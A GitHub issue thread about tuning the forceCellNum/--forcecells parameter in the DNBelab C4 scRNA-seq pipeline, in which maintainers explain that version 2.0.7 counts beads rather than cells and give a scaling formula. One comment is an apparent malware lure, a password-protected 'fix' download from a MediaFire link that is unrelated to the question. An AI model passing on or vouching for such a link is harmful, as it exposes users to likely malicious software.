### ISSUE TITLE
How to adjust `forceCellNum` for Optimal Cell Yield and Accuracy in the Pipline "DNBelab C4 scRNA-seq v2"

### ISSUE THREAD

**Issue by nh-codem** [MGI-tech-bioinformatics/DNBelab_C_Series_HT_scRNA-analysis-software#103]
We have some questions regarding the `forceCellNum` parameter in the workflow. According to the manual, this parameter is described as "forcing the number of beads based on the elbow plot." However, in practice, when we set it to 5000 or 10000 , the number of cells produced in the library is not strictly controlled but varies within a range—for instance, 5000 may yield 3k-6k cells, and 10000 may yield 7k-11k cells, as shown below.. Our collaborators are particularly concerned about a case where 20,000 cells were used for library preparation. How should we set the parameters to maximize error tolerance while controlling the false positive rate to obtain a reliable cells X genes expression matrix?

![image](https://github.com/user-attachments/assets/f45df347-b354-465e-90d3-cb43069db5c9)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Nh-code** [comment]
> `forceCellNum` parameter

Are you suggesting that the issue with the forceCellNum parameter not performing the forced cutoff function as expected could be due to a potential problem with the workflow setup by our technical support on the collaborator’s server?

**Comment by Nh-code** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

You suggesting that the issue with the `forceCellNum` parameter not performing the forced cutoff function as expected could be due to a potential problem with the workflow setup by our technical support on the collaborator’s server?

**Comment by lishuangshuang0616** [comment]
Hello, in version 2.0.7, the` --forcecells` parameter refers to the forced number of beads, so the final cell count will be lower than the value you provide because the cells need to be merged. In the new version, we have adjusted this to directly specify the number of cells. If you are still using version 2.0.7, we recommend adjusting the `--forcecells` value approximately based on the current merging ratio (**_forcecells/Estimated_**). @Nh-code

**Comment by nh-codem** [comment]
> Hello, in version 2.0.7, the` --forcecells` parameter refers to the forced number of beads, so the final cell count will be lower than the value you provide because the cells need to be merged. In the new version, we have adjusted this to directly specify the number of cells. If you are still using version 2.0.7, we recommend adjusting the `--forcecells` value approximately based on the current merging ratio (**_forcecells/Estimated_**). @Nh-code

The phrase “so the final cell count will be lower than the value you provide because the cells need to be merged” implies that the merging of cell barcodes based on **Oligos** occurs before the forced cutoff step with beads. Is that correct?

As for the part about adjusting `--forcecells` based on the **merging rate**, I didn't fully understand. Could you give an example?

**Comment by lishuangshuang0616** [comment]
For example, if the force is set to 10,000 and you obtain 7,000 cells, then to achieve 10,000 cells, you can use 10,000 * (10,000 / 7,000), which is approximately 14,300.

If you need an accurate value, it is recommended to use version 2.1.2 . However, please note that these versions will have some differences in the analysis compared to version 2.0.7, which may lead to variations in the results.
